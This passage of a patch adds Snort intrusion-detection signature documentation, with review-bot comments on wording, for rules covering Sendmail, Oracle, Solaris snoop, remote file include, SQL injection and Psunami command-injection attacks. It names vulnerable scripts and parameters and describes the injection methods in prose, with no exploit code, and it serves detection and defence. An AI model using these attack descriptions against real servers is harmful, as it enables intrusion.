+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
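Review bot: Additional References is empty although Detailed Information describes a specific, versioned issue (an ACE size of 0 in NT ACL parsing, "Ethereal 0.10.7 and prior"); the vendor advisory for that release should be cited so the affected-version claim can be checked. Under Corrective Action, "Apply the appropriate vendor supplied patch" lacks a period and says the same thing as "Upgrade to the latest non-affected version of the software"; one line suffices. The Attack Scenarios sentence is a comma splice ("... large NT ACLs, the attacker then needs ...") and should be split.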
--- /dev/null
+++ b/doc/signatures/264.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+264
+
+--
+Summary:
+This event is generated when spurious DNS traffic is detected on the network. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This event indicates that abnormal DNS traffic has been detected. The implications are varied and careful investigation of the source and destination should be undertaken.
+
+This may be the result of an improperly configured DNS server or it may be an indication that an attack against the DNS server is underway.
+
+--
+Affected Systems:
+Any DNS server.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Simple to Difficult depending on the DNS implementation.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+Keep all DNS software up to date and correctly configured.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
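Review bot: neither the Summary ("spurious DNS traffic") nor Detailed Information ("abnormal DNS traffic has been detected") says what condition sid 264 actually matches, so an analyst cannot tell from this page why the alert fired or how to tune it; describe the packet property the rule keys on. Attack Scenarios describes spoofed DNS responses, so if that is what the rule detects, say so in the Summary. Additional References is empty.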
--- /dev/null
+++ b/doc/signatures/2224.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2224
+
+--
+Summary:
+This event is generated when an attempt is made to access psunami.cgi on an internal web server. This may indicate an attempt to exploit a remote command execution vulnerability in Psunami bulletin board software.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+Psunami is a CGI script that provides online bulletin board for web sites. It contains a metacharacter parsing vulnerability that allows an attacker to submit a URL that contains shell code between pipe characters (|) in the topic parameter. When the web server receives the HTTP request, it executes the code placed between the pipe characters.
+
+--
+Affected Systems:
+Any web server running Psunami 0.5.2 or earlier.
+
+--
+Attack Scenarios:
+An attacker places shellcode, surrounded by pipe characters, in the topic parameter of an HTTP request to psunami.cgi. Any commands included in the value are executed with the security context of the web server.
+ 
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses psunami.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Psunami 0.5.3 (http://sourceforge.net/projects/psunami/).
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
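Review bot: Detailed Information says the attacker places "shell code between pipe characters (|) in the topic parameter" and Attack Scenarios says "shellcode"; what is described is shell commands run by the web server through metacharacter injection, not shellcode in the machine-code sense, so use "shell commands" in both places to avoid confusing the reader. "provides online bulletin board for web sites" needs an article ("an online bulletin board"). The upgrade URL in Corrective Action (sourceforge.net/projects/psunami/) belongs under Additional References, which is currently empty.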
--- /dev/null
+++ b/doc/signatures/1066.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1066
+
+--
+Summary:
+This event is generated when an attempt is made to access telnet.exe on a remote
+web server via a web request.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to acess telnet.exe on a remote
+web server.  The attacker can use telnet to directly connect to other computers
+and launch attacks from the web server.
+
+This event indicates that an attempt has been made to execute the
+program telnet.exe using a web request.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+The attacker may use telnet to access other machines or compromise the
+resources on the target system.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
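Review bot: "an attempt is made to acess telnet.exe" in Detailed Information is a typo for "access", and "attackers choosing" in Impact needs an apostrophe. The second Detailed Information paragraph ("This event indicates that an attempt has been made to execute the program telnet.exe using a web request") restates the Summary and can be dropped. The file does not say whether the rule matches the string "telnet.exe" anywhere in a request or only at a specific path; stating that would help readers tune the rule.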
--- /dev/null
+++ b/doc/signatures/100000405.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000405
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "artedit.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "artedit.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
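Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... credentials of a client host ...") is the generic CGI boilerplate from 1482.txt and 1658.txt and does not describe a remote file include; the first paragraph already explains the babInstallPath/artedit.php include, so drop the boilerplate. "may indicate that an exploitation attempt has been attempted" is redundant ("may indicate an exploitation attempt"), "running ona web server" should be "on a", and "All systems running CGI applications using Ovidentia" under Affected Systems is garbled ("All systems running Ovidentia"). The file also starts with two blank lines and ends with a blank line after the closing "--", unlike the other files.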
--- /dev/null
+++ b/doc/signatures/1658.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1658
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
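Review bot: typo in the first paragraph of Detailed Information, "running ona web server" should read "running on a web server". Beyond that, the Summary and Detailed Information never say which CGI script or request pattern sid 1658 actually matches, so the whole file is generic boilerplate that could describe any CGI rule; name the URI or script the rule looks for so an analyst can tune it, and fill in the empty Additional References section with the advisory the rule was written from, if one exists.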
--- /dev/null
+++ b/doc/signatures/1292.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid: 
+1292
+
+--
+Summary: 
+This may be post-compromise behavior indicating the use of Windows
+directory listing tools.
+
+--
+Impact: 
+Varies, an attacker might have gained an ability to execute commands remotely
+
+--
+Detailed Information:
+This rule is aimed at catching the standard Windows commands for
+listing directories. The string "Volume Serial Number" is typically shown in
+front of the directory listing on Windows NT/2000/XP.  Seeing such a
+response in the HTTP traffic indicates that somebody have managed to
+"convince" the web server to spawn a shell bound to a web port and
+have successfully executed at least one command to list the
+directory. Note that the source address of this signature is actually
+the victim and not the attacker as for the exploit signatures.
+
+--
+Affected Systems:
+	Microsoft Windows systems
+
+--
+Attack Scenarios:
+An attacker gains an access to a Windows web server via IIS vulnerability 
+and manages to start a cmd.exe shell. He then proceeds to look for 
+interesting files on the compromised server via the "dir" command.
+
+--
+Ease of Attack: 
+Simple. This post-attack behavior can accompany different attacks.
+
+--
+False Positives: 
+The rule will generate an event if the string "Volume Serial Number" appears in the 
+content distributed by the web server, in which case the rule should be 
+tuned.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action: 
+Investigate the web server for signs of compromise,
+
+Use system integrity checking software, check for other IDS alerts
+involving the same IP addresses.
+
+--
+Contributors: 
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
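Review bot: grammar in Detailed Information, "indicates that somebody have managed to" should be "somebody has managed to", and the following "have successfully executed" should be "has successfully executed". In Corrective Action the first sentence ends with a comma ("signs of compromise,") where a period is needed. Minor style points: "Sid: " and the "-- " separator before Additional References carry trailing whitespace, unlike the other files in this patch, and Additional References is empty.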
--- /dev/null
+++ b/doc/signatures/2265.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2265
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-07.html
+
+--
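Review bot: Affected Systems says "All systems using Sendmail", but Detailed Information scopes the prescan() flaw to Sendmail prior to version 8.12.9; narrow Affected Systems to match, e.g. "Sendmail versions prior to 8.12.9". Typo in Corrective Action, "verison" should be "version", and since Detailed Information already names 8.12.9 as the first unaffected release, say "Upgrade to Sendmail 8.12.9 or later" rather than "the latest non-affected version".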
--- /dev/null
+++ b/doc/signatures/1963.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1963
+
+--
+Summary:
+The RQUOTA daemon is an RPC server that returns quotas for users on the 
+local file systems.  
+
+Some versions of solaris ship with a vulnerable version of snoop that 
+attempts to parse RQUOTA GETQUOTA requests.  Snoop contains a boundary 
+condition error that could result in a buffer overflow that will present
+the attacker with super user access to the target host.
+
+--
+Impact:
+Complete control of the target machine.
+
+--
+Detailed Information:
+The sniffing program named snoop is installed on certain version of Sun 
+Solaris.
+
+When run by the super-user, snoop will monitor network traffic on the 
+host's network segment.  When snoop attempts to decode RQUOTA GETQUOTA 
+requests, snoop does not properly handle user supplied data resulting in
+a buffer overflow.
+
+--
+Affected Systems:
+	Sun Solaris 2.4, 2.5, 2.5.1, 2.6, 2.7 for SPARC and Intel architectures
+
+--
+Attack Scenarios:
+The attacker must send specially crafted packets past a network segment 
+monitored by vulnerable versions of snoop
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for each affected system.
+
+Use a different network monitoring tool other than snoop.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
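Review bot: the Summary is hard to follow because it opens by describing the RQUOTA daemon and then says the flaw is in snoop's parsing of RQUOTA GETQUOTA requests; state up front that the vulnerable component is the snoop packet decoder (as Detailed Information does), not the rquota service whose traffic it decodes. Minor: "solaris" should be capitalised, "certain version of Sun Solaris" should be "certain versions", and the Attack Scenarios sentence lacks a terminating period. Additional References is empty; the vendor advisory for the snoop overflow belongs here.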
--- /dev/null
+++ b/doc/signatures/100000686.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+100000686
+
+--
+Summary:
+This event is generated when an empty CTCP NOTICE message is sent to an IRC 
+channel.
+
+--
+Impact:
+If the EnergyMech IRC Bot receives such a message, a denial of service 
+condition will occur.
+
+--
+Detailed Information:
+Whenever the EnergyMech IRC Bot processes a null CTCP NOTICE message, a denial 
+of service condition occurs. Note that this rule is set to examine only default 
+IRC ports, in order to conserve system resources; if you are particularly 
+concerned about this exploit, you may wish to set the ports to "any", as IRC 
+channels can exist on any port.
+
+--
+Affected Systems:
+EnergyMech <= 3.0.1
+
+--
+Attack Scenarios:
+An attacker could exploit this vulnerability via any IRC client, or by using an 
+automated script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to version 3.0.2 or greater.
+
+--
+Contributors:
+VeriSign MSS Operations Team
+Joel Esler <joel.esler@sourcefire.com>
+
+--
+Additional References:
+http://www.energymech.net/versions-3.0.html
+
+--
--- /dev/null
+++ b/doc/signatures/1677.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1677
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
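Review bot: Attack Scenarios reads "Simple. These are Oracle database commands.", which is an Ease of Attack answer rather than a scenario; describe how the command reaches the server, for instance over a session obtained after the separate compromise that Detailed Information mentions. Detailed Information also refers to "a legitimate telnet connection", which does not fit a rule watching $ORACLE_PORTS; reword it to refer to the database session. Formatting: "Sid: 1677" puts the value on the heading line and the file inserts a blank line after each "--", unlike the other files in this patch, and the Corrective Action sentence "investigate the server for signs of compromise" lacks a period.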
--- /dev/null
+++ b/doc/signatures/670.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+670
+
+--
+Summary:
+This event is generated when an external attacker attempts to use a specific exploit against Sendmail that allows the attacker to execute remote commands on the server, and to email files from the server to a remote email account.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, possibly leading to remote root compromise, or at the very least, information disclosure. 
+
+--
+Detailed Information:
+Sendmail 8.6.9 and earlier contain a vulnerability related to the parsing of commands passed from ident to Sendmail. An attacker can use a specific exploit to send a message through the mail server. The message is not properly parsed and Sendmail forwards the response, with included commands, to its queue. The commands are then executed while the message awaits delivery in the Sendmail queue, causing the included arbitrary code to be executed on the server in the security context of Sendmail. The exploit in question allows the attacker to execute commands to email files from the server to a remote email account.
+
+--
+Affected Systems:
+Systems running unpatched versions of Sendmail 8.6.9 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends an email generated by the exploit, and customizes it to mail the server's password file to a remote email account. The attacker then cracks the passwords in the password file and is able to access the server directly.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Sendmail 8.6.10 or higher.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0204
+
+Bugtraq
+http://www.securityfocus.com/bid/2311
+
+--
--- /dev/null
+++ b/doc/signatures/634.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+634
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain which ports a host may be listening on, whether or not the ports are filtered by a firewall and if the host is vulnerable to a particular exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. Then the attacker might find out that the FTP service is vulnerable to a particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
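Review bot: the Summary ("This event is generated when a scan is detected.") does not say what traffic sid 634 matches; state the scanner or request pattern the rule looks for so the False Positives advice ("A scanner may be used in a security audit") can be acted on. Attack Scenarios uses FTP on ports 21 and 20 as an example, but nothing in the file ties this rule to FTP; either drop the example or explain the connection. Additional References is empty.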
--- /dev/null
+++ b/doc/signatures/100000496.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000496
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Chipmailer" application running on a webserver. Access to 
+the file "index.php" with SQL commands being passed as the "anfang" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "anfang" parameter in the "index.php" script used by the 
+"Chipmailer" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Chipmailer
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
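Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials ...") is authentication boilerplate that does not describe SQL injection through the "anfang" parameter; drop it and keep the input-validation paragraph. Also "ona web server" should be "on a web server", "an exploitation attempt has been attempted" is redundant ("an exploitation attempt has been made"), and the "--" separators after the Sid value, after Affected Systems and after Contributors lack the blank line used elsewhere in the patch.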
--- /dev/null
+++ b/doc/signatures/2205.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2205
+
+--
+Summary:
+This event is generated when an attempt is made to access ezboard.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in EasyBoard 2000 1.27.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+EasyBoard 2000 (EZBoard) is CGI-based bulletin board software for web servers. It contains a vulnerability that allows a malicious user to craft an HTTP request that causes a buffer overflow condition on the web server, and can overwrite system memory with data included in the URL. This enables the attacker to execute arbitrary code on the server with the security context of the web server.
+
+
+--
+Affected Systems:
+Systems running EasyBoard 2000 1.27.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to ezboard.cgi on a vulnerable web server, creating a buffer overflow condition. The attacker is then able to execute arbitrary code with the security context of the web server. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses ezboard.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched by the vendor. However, Jin Ho Yu has submitted a third-party fix to the Bugtraq list. See http://marc.theaimsgroup.com/?l=bugtraq&m=101345069220199&w=2 for ezboard-fix.pl. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4068
+
+--
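Review bot: Corrective Action states "It is not known if this vulnerability has been patched by the vendor" and points to a third-party ezboard-fix.pl on a mailing-list archive; before shipping this should be re-checked against the vendor, and if the status is still unknown the sentence should carry a date so readers know how old the advice is. Minor: there is a doubled blank line after the Detailed Information paragraph.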
--- /dev/null
+++ b/doc/signatures/2872.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2872
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_number
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
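Review bot: in Detailed Information the sentence about the vulnerable procedure has a line break before its period, so one line begins ". This procedure is included in"; join it as "vulnerability in the procedure alter_priority_number. This procedure is included in sys.dbms_repcat_conf." Affected Systems reads "Oracle Oracle9i", a duplicated vendor name. Apart from the procedure and package names, the Summary, Impact, Detailed Information, Attack Scenarios and Corrective Action text is identical to the sids 2918 and 2799 files in this patch, so the shared paragraphs would be better generated from one template than hand-copied. Additional References is empty.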
--- /dev/null
+++ b/doc/signatures/2918.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2918
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_for_local_flavor
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
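Review bot: same line-break defect as sid 2872: the Detailed Information sentence breaks before its period, leaving a line that starts ". This procedure is included in"; join it as "vulnerability in the procedure validate_for_local_flavor. This procedure is included in sys.dbms_repcat_sna." Affected Systems reads "Oracle Oracle9i" (duplicated vendor name), and Additional References is empty.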
--- /dev/null
+++ b/doc/signatures/100000378.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000378
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_forums.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_forums.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
